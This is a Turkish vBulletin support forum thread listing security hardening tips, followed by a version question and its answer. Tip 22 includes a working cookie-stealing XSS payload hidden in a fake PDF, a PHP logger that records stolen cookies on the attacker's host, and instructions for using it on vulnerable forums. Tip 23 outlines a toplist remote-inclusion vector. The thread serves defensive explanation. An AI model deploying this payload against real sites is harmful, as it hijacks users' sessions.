vBulletin Destek | Güncel.Net   Webmaster Kütüphanesi.


vBulletin Güvenlik vBulletin Güvenlik Önlemleri.


vBulletin Güvenlik Açıkları ve Kapatma Yöntemleri

vBulletin Güvenlik


Like Tree1Beğeni(ler)
  • 1 Post By Garfield
Yeni Konu aç  Cevapla
 
Seçenekler Arama Stil
Alt 16.04.2019   #1
Üye Rütbesi
Garfield - ait Kullanıcı Resmi (Avatar)
Üyelik: 27.02.2019
Üye No: 50
Yaş: 39
Yer: Kocaeli
Mesajlar: 206
Konular: 183
Aldığı Beğeni: 16
Yaptığı Beğeni: 2
Ticaret Puanı: (0 )
Bahsedilme: 3 Mesaj
Standart vBulletin Güvenlik Açıkları ve Kapatma Yöntemleri

1- İLk olarak her zaman için forumunuzu son çıkan vbulletin sürümüne upgrade edin daha güvenlidir.
2-Herhangi bi eklentide php dosyası veya php dosyalarında editleme varsa iyice dikkat edin sonradan açık teşkil edebilir.
3-Ftp nize girin ve tüm dosyalarının chmod değerlerinin 777 olmamasına dikkat edin çünkü fso ile serverınıza girilirse hacklenmeyin adam yazma hakkı bulamaz kurtulmuş olursunuz.
4- Config.php dosyanızı mutlaka kriptolayınki herhangi bi fso ile girildiğinde sql bağlantı için kimse okuyamasın.
5- Eğer phpmyadmin kullanıyorsanız phpmyadmin adresinizin şifreli olduğundan emin olun değilse şifreleyin.
6- Admincp ve modcp klasörlerinizin ismini değiştirin vede şifreleyin o klasörleri.
7-Çok basit şifreler kullanmayın şifrelerinizde &%+/ gibi özel karekterlerin olmasına özen gösterin
8-Trojen yerseniz mutlaka hemen format atın ve tüm ftp +panel v.s şifrelerinizi değiştirin
9-Forumu kurduktan sonra mutlaka install klasörünü silin sadece install.php yi değil zaten herhangi bir işlevi olmıyan klasör komple silin ileriki zamanlarda açık teşkil etmesin.
10-Mutlaka hergün sitenizin yedeğini alın herhangi bi sorunla karşılaşırsanız yedeği geri yükleyip ufak bir zararla atlatırsınız.
11- Calender(Takvim) i silin biri oraya Hacked by ****** gibisinden bişeyler ekliyerek lamerlik yapabilir.
12-Shoutbox kullanıyorsanız mutlaka html ve images ları kapatın bunlar açık teşkil ediyorlar.
13-Eğer yedeği ftp nize yollayıp ordan bilgisayarınıza çekiyorsanız yedek aldıktan sonra mutlaka ftp nizden silin çünkü yedek alınması için klasörün chmod u 777 dir ve isteyen herkez yedeği bilgisayarına indirebilir.

14- imzada html kodlarını kapatın bu yöntemle xss veya yönlendirme yapılabilir.
15- Üye olurken mutlaka resim doğrulaması olsun eğer hostunuzdan doğan bir image sorunu varsa herhangi zorunlu bir ek bilgi ekleyinki siteniz flood saldırısına maruz kalmasın.
16- Herhangi bi konuda TIKLA gibisinden yazılara direk tıklamayın önce sağ tıklayıp özelliklerden linke bakın ondan sonra tıklayın.
17-Özel mesajlarda çok özelliğin açık olmasına gerek yok cookieslerinizin güvenliği açısından özel mesajdaki özellikleri kapatın image v.s
18-Yeni kullanıcı grup eklerken bu uye grubu halka acık olsunmu seçeneğini mutlaka hayır yapın diğer kullanıcılar bu grubu seçemesin.
19-Eğer null sürüm kullanıyorsanız dosyalara dikkat edin null iken kişi sizin bilgilerinize ulaşmak için açık kapı bırakmış olabilir ör: 3.5.3 sürümündeki sm-check.php dosyası.
20-eğer topx kullanıyor kullanıyorsanız yönlendirme yemediğinden emin olun herhangi biri indexine yönlendirebilir [Üye Olmadan Linkleri Göremezsiniz. Üye Olmak İçin Tıklayın...] örneğin burdaki kod o yüzden eğer topx iniz yönlendirme yiyosa yönlendirme kodundaki kelimeleri sansürleyin vede en garanti yol olarak açıksız topx ler var onu kullanın
21-Eğer toplistinizi eklenti olarak kullanıyosanız html kodlarının kapalı olmasına dikkat edin çünkü yönlendirme koduyla indexe yönlendirilebilir.
22- Gelelim eklentiden doğan xss açığına
Notepad ile yeni bir dosya açıp aşağıdaki kodu içine yapıştırın ve testmagic.pdf olarak kaydedin.


Code:

**********
d o c u m e n t.write('<img src="http://host adresiniz/c.php?c='+********.cookie+'" WIDTH=0 HEIGHT=0>');
********.********.href="https://www.google.com/adsense/testmagic.pdf";
</script>
Aşağıdakini de c.php olarak kaydedip bir host a atın.



Code:

<?php
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date=date("m/d/Y g:i:s a");
$referer= getenv ('HTTP_REFERER');
$fl = fopen('megalog.txt', 'a');
fwrite($fl, "\n".$ip.' :: '.$date."\n".$referer."\n".$cookie."\n");
fclose($fl);
?>
Nasıl kullanılacağına geçelim :

vbulletin 3.5.4 kullanan bir foruma üye olup mesajımızı yazıyoruz. daha sonra yazdığımız mesaja testmagic.pdf i ekliyoruz. eğer o sitede açık varsa mesajı gören kullanıcıların cookie si hostunuzdaki log.txt e kaydedilecek.

Kodlardaki bazı adresler yerine biliyorsunuz ki kendi adreslerinizi yazacaksınız.Bu açık sadece IE kullananlarda geçerlidir.

işte eklentiden doğan xss açığı böyle kapatmak için pdf türü eklentiyi silmelisiniz.

23-Diğer vbulletin toplist açığıda şöyle [url="http://www.hedefsite.com/toplist/sources/join.php?FORM"][Üye Olmadan Linkleri Göremezsiniz. Üye Olmak İçin Tıklayın...][Üye Olmadan Linkleri Göremezsiniz. Üye Olmak İçin Tıklayın...]?
bu şekilde biri sitenize fso ile uzaktan bağlantı kurabilir bunun için join.php deki FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path] kodunu silmeniz gerekmektedir.



----


Güncel.Net | Güncel.Net/forum | vbulletin.güncel.net | wordpress.güncel.net


Güncel.Net Ailesi her geçen gün alt yapısına ciddi yatırımlar yapan kalıcı bir platformdur, lütfen Forum Kurallarını ihlal etmeyiniz...

[Üye Olmayanlar Linkleri Göremez, Üyelik için TIKLAYIN...]
Garfield isimli Üye şimdilik offline konumundadır  
Alıntı ile Cevapla

Garfield Kullanıcısının Son 5 Konusu
Konu Başlığı Forum Son Yazan Cevaplar Okunma Son Mesaj
Flood yapmak yasaktır! Flood Nedir ? Forum Hakkında Garfield 0 11 24.05.2019 15:26
vBulletinde kod araması nasıl yapılır ? vBulletin Genel Garfield 0 9 23.05.2019 11:10
vBuLLetin Arka Plana Resim Koymak vBulletin Genel Garfield 0 43 16.04.2019 14:41
Foruma 2. Navbar alanını ekleme vBulletin 3.x Düzenlemeleri Garfield 0 67 16.04.2019 14:41
vBulletin Banner Entegrasyonu vBulletin 3.x Düzenlemeleri Garfield 0 22 16.04.2019 14:37

Reklam Alanı
Alt 2 Hafta önce   #2
Üye Rütbesi
SuperGaZi - ait Kullanıcı Resmi (Avatar)
Üyelik: 08.05.2019
Üye No: 127
Yaş: 33
Yer: Avrupa
Mesajlar: 1
Konular: 0
Aldığı Beğeni: 0
Yaptığı Beğeni: 1
Ticaret Puanı: (0 )
Bahsedilme: 0 Mesaj
Standart Cevap: vBulletin Güvenlik Açıkları ve Kapatma Yöntemleri

Merhaba.
Bilgiler icin tesekkür ederim. Elimde 3.8.1 Vbulletin lisansli sürüm mevcut. Uzun zaman sonra kullanmak istedim. Bu dediklerinizi sürüm olarak 3.8.1 icin yapabilirim degil mi? Genel olarak Vbulletin icin mi bunlar yoksa sürümden sürüme degisir mi? Xampp ile denemeler yapiyorum. Forumu ilk yükledigimde 3.8.1 di. Sonra vbulletin sitesinden güvenlik olarak yayinlanan 3.8.9 u yükledim. Asagidaki gibi degisti. Yani forumun sürümü mü degisti? Bunu sundan soruyorum Forum anasayfasinda en asagida bir degisiklik olmadi. En güncel sürüm 3.8.11 yaziyor ancak onuda bulamadim.


[Üye Olmayanlar Linkleri Göremez, Üyelik için TIKLAYIN...]

Kisacasi bu bilgiler icin yeniden tesekkür ederim. Yinede Vbulletin 3.8 in kurulumundan sonra güvenlik acisindan öncelikli yapmam gerekenler nelerdir diye sormak istiyorum.

Ve eklentiler. Vbulletin 3.8 icin hangi güzel eklentiler mevcut? Bunlar sizde mevcut mu? Paylasabilir misiniz? Tesekkürler.



----
SuperGaZi isimli Üye şimdilik offline konumundadır  
Alıntı ile Cevapla
Reklam Alanı
Alt 2 Hafta önce   #3
Üye Rütbesi
Garfield - ait Kullanıcı Resmi (Avatar)
Üyelik: 27.02.2019
Üye No: 50
Yaş: 39
Yer: Kocaeli
Mesajlar: 206
Konular: 183
Aldığı Beğeni: 16
Yaptığı Beğeni: 2
Ticaret Puanı: (0 )
Bahsedilme: 3 Mesaj
Standart Cevap: vBulletin Güvenlik Açıkları ve Kapatma Yöntemleri

Alıntı: SuperGaZi Nickli Üyeden Alıntı
Merhaba.
Bilgiler icin tesekkür ederim. Elimde 3.8.1 Vbulletin lisansli sürüm mevcut. Uzun zaman sonra kullanmak istedim. Bu dediklerinizi sürüm olarak 3.8.1 icin yapabilirim degil mi? Genel olarak Vbulletin icin mi bunlar yoksa sürümden sürüme degisir mi? Xampp ile denemeler yapiyorum. Forumu ilk yükledigimde 3.8.1 di. Sonra vbulletin sitesinden güvenlik olarak yayinlanan 3.8.9 u yükledim. Asagidaki gibi degisti. Yani forumun sürümü mü degisti? Bunu sundan soruyorum Forum anasayfasinda en asagida bir degisiklik olmadi. En güncel sürüm 3.8.11 yaziyor ancak onuda bulamadim.


[Üye Olmayanlar Linkleri Göremez, Üyelik için TIKLAYIN...]

Kisacasi bu bilgiler icin yeniden tesekkür ederim. Yinede Vbulletin 3.8 in kurulumundan sonra güvenlik acisindan öncelikli yapmam gerekenler nelerdir diye sormak istiyorum.

Ve eklentiler. Vbulletin 3.8 icin hangi güzel eklentiler mevcut? Bunlar sizde mevcut mu? Paylasabilir misiniz? Tesekkürler.
Öncelikle merhabalar, belirtmek ısterım kı upload ettıgını resım sıtesındekı resım gorunmemekte site kaynaklı bir sorun var sanırım

konumuza gelecek olur ısek sizin yaptıgınız vbulletin guncelleme yada upgrade yani surum yukseltme ısı gorsel olarak gorunen bir ıslem değildir, vbulletinin alt tabanına yenı ozellıkler sunan ust surum aynı zamandada alt yapı ıslevsel değişiklikler sunar, gorsel olarak gorebılecegınız seyler kullandıgınız tema ıle ılgılı seylerdır temada yaptıgınız değişiklikler gorselde gorunur, bızım konuda bahsettıgımız guvenlık onemlemrı ise hemen hemen tüm vbulletin surumelrını kapsar. 3 serisi 4 serisi 5 serisi gibi.



----
SuperGaZi bunu beğendi.


Güncel.Net | Güncel.Net/forum | vbulletin.güncel.net | wordpress.güncel.net


Güncel.Net Ailesi her geçen gün alt yapısına ciddi yatırımlar yapan kalıcı bir platformdur, lütfen Forum Kurallarını ihlal etmeyiniz...

[Üye Olmayanlar Linkleri Göremez, Üyelik için TIKLAYIN...]
Garfield isimli Üye şimdilik offline konumundadır  
Alıntı ile Cevapla
Reklam Alanı
Cevapla


Konuyu Toplam 1 Üye okuyor. (0 Kayıtlı üye ve 1 Misafir)
 
Seçenekler Arama
Stil

Yetkileriniz
Konu Acma Yetkiniz Yok
Cevap Yazma Yetkiniz Yok
Eklenti Yükleme Yetkiniz Yok
Mesajınızı Değiştirme Yetkiniz Yok

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodu Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı



Tüm Zamanlar GMT +3 Olarak Ayarlanmış. Şuanki Zaman: 20:07.

“Bir delil ile 40 alimi yendim, 40 delil ile bir cahili yenemedim.” “Hz.Mevlana”



Forum Hakkında

vBulletin Destek Platformu | Güncel.Net

Powered by vBulletin® Version 3.8.4
Copyright ©2018-2019 Güncel.Net

Forum Adresimizde T.C.K 20.ci Madde ve 5651 Sayılı Kanun'un 4.cü maddesinin (2).ci fıkrasına göre TÜM ÜYELERİMİZ yaptıkları paylaşımlardan sorumludur.

Yararlı Linkler

Sosyal Paylaşım


vBulletin® Copyright ©2019 Jelsoft Enterprises Ltd.